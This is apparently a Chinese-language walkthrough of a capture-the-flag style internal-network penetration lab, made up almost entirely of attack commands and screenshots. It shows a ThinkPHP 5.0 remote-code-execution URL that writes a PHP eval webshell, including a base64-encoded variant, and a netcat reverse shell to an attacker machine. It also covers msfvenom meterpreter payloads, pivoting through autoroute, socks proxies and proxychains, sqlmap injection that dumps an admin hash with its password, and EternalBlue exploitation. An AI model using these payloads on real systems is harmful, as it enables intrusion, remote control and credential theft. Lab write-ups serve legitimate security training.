nmap扫描
nmap -sV -p1-65535 192.168.1.135
data:image/s3,"s3://crabby-images/712ea/712ea4084a062ad854c14f7bdfb10e353fba42e5" alt=""
data:image/s3,"s3://crabby-images/7e276/7e276b9b91b5f32e878bb735783304130f4688e1" alt=""
thinkphp5.0版本
找到poc进行测试
http://192.168.1.135/index.php?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
data:image/s3,"s3://crabby-images/6fc58/6fc58b6953371286138ca4e455527dbb570e5016" alt=""
http://192.168.1.135/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > 1.php
data:image/s3,"s3://crabby-images/9e7fb/9e7fbb7b3b7b20b2ee165ea23327f40096fd5da4" alt=""
写入成功
data:image/s3,"s3://crabby-images/f210d/f210d61441c14070c662733c504559d175410692" alt=""
进行转义
http://192.168.1.135/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" >2.php
data:image/s3,"s3://crabby-images/b658d/b658d7118cb6999b842c49c61e60f5734c8e223e" alt=""
或者使用base64编码
<?php @eval($_POST['cmd']);?>
转码为
PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=
http://192.168.1.103/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="| base64 -d > 3.php
反弹kali
nc 192.168.1.104 6666 -e /bin/bash
kali获取bash
python -c 'import pty;pty.spawn("/bin/bash")'
data:image/s3,"s3://crabby-images/2a35e/2a35e85a560d70b5a7bb07c808fc3b3b3cbdedcb" alt=""
flag
data:image/s3,"s3://crabby-images/f3b61/f3b61784af2cbb1d9f816de57e4141690f6a4936" alt=""
data:image/s3,"s3://crabby-images/7f097/7f09712febb3530b99c3762e618babf7d44b6301" alt=""
data:image/s3,"s3://crabby-images/d4424/d4424c1f7f8c7b85a226b2961ed90a342396f191" alt=""
msf生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=1234 -f elf >1.elf
蚁剑上传
chmod 777 1.elf
./elf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > run
data:image/s3,"s3://crabby-images/e70d8/e70d88a300682de377080c7a14bc6c7e79ef006a" alt=""
data:image/s3,"s3://crabby-images/17486/174863715b2964d85e0eba6075b9bce921c4fff2" alt=""
获取当前的网段
run get_local_subnets
data:image/s3,"s3://crabby-images/103f3/103f3db5460ba12ab755451fe1b5d716b21e3cc8" alt=""
添加路由
run autoroute -s 192.168.22.0/24
run autoroute -p
data:image/s3,"s3://crabby-images/a1dc0/a1dc0ead32ea707ba21b036535a529ef72dbee06" alt=""
内网扫描
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
data:image/s3,"s3://crabby-images/a9958/a9958a06bfe6f1df946082b330c9f9c5c1906dc8" alt=""
设置socks4a代理
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
srvport => 2222
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
data:image/s3,"s3://crabby-images/8bc17/8bc17e3156a5547110869f8708aa986419d3b366" alt=""
修改proxychains
vim /etc/proxychains.conf
socks4 192.168.1.128 2222
data:image/s3,"s3://crabby-images/c6930/c6930bf98c440a0bacece7471c86695306d21152" alt=""
proxychains nmap -Pn -sT 192.168.22.129
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect
data:image/s3,"s3://crabby-images/10a82/10a8254c403ba5796b07c4e1e67c4845c07278fc" alt=""
通过代理访问80端口的网站
data:image/s3,"s3://crabby-images/53127/531270b6c40ecab2cfd0917f146c29f2716aea7a" alt=""
proxychains dirb http://192.168.22.129
data:image/s3,"s3://crabby-images/02f7f/02f7f2560facb42a2b2ac51dd5e4bebc28af0a5d" alt=""
data:image/s3,"s3://crabby-images/15e6f/15e6f40719db2ff05945dad4d8158fb19b21c76a" alt=""
data:image/s3,"s3://crabby-images/1b805/1b805a7ecca4ff04a096462c8043bd33c57cc6db" alt=""
注入
proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword
proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword --dbs
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password –dump
admin | 46f94c8de14fb36680850768ff1b7f2a (123qwe)
登录后台
data:image/s3,"s3://crabby-images/6fdf0/6fdf0778cdbe1646cecb934facecfadaa420240e" alt=""
设置proxifier
msf生成木马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=432 -f elf > 5.elf
这次使用bind_tcp，由Target2作为监听端
proxychains msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 432
msf5 exploit(multi/handler) > run
data:image/s3,"s3://crabby-images/ac471/ac471e917afcff6cad9180d6784c5de0741eb96b" alt=""
获取当前网段
run get_local_subnets
data:image/s3,"s3://crabby-images/4f9f3/4f9f31dce962451e06c45412dfb374ad1cc3429c" alt=""
添加路由
run autoroute -s 192.168.33.0/24
run autoroute -p
data:image/s3,"s3://crabby-images/9b4dd/9b4dd6e2b39885d91e49c574c77338b9bcfd50ce" alt=""
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2223
srvport => 2223
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 2.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
data:image/s3,"s3://crabby-images/dcb8f/dcb8fd1505dcc382426136ae7d6a4ee16a05eeac" alt=""
修改proxychains
vim /etc/proxychains.conf
socks4 127.0.0.1 2223
探测33网段
use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
data:image/s3,"s3://crabby-images/2f563/2f563c9f0a23cc2007a34e99c8e20db3dd410df8" alt=""
端口扫描
proxychains nmap -Pn -sT 192.168.33.33
data:image/s3,"s3://crabby-images/50232/50232c5c7ea519f873dd398eaa578fccd56e9195" alt=""
开放了445和3389端口
auxiliary/scanner/smb/smb_version
data:image/s3,"s3://crabby-images/5ae19/5ae19692b70296861d619a2e60d4233de8c8b492" alt=""
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
data:image/s3,"s3://crabby-images/b0580/b05804112bce1038cd9c823dae26ad21910892df" alt=""
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.33.33
rhost => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
data:image/s3,"s3://crabby-images/80231/80231d6cc9aa0f3d21a914e8be32ba166f8bda44" alt=""
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.33
RHOST => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > run
切换到65001（UTF-8）代码页以解决乱码
chcp 65001
data:image/s3,"s3://crabby-images/71163/71163119df3cfd6dd9ab32dcf80db21b4acc4ab8" alt=""
data:image/s3,"s3://crabby-images/a0bf8/a0bf84b3e29b6d1f45d6b0bf4844454fc5731e68" alt=""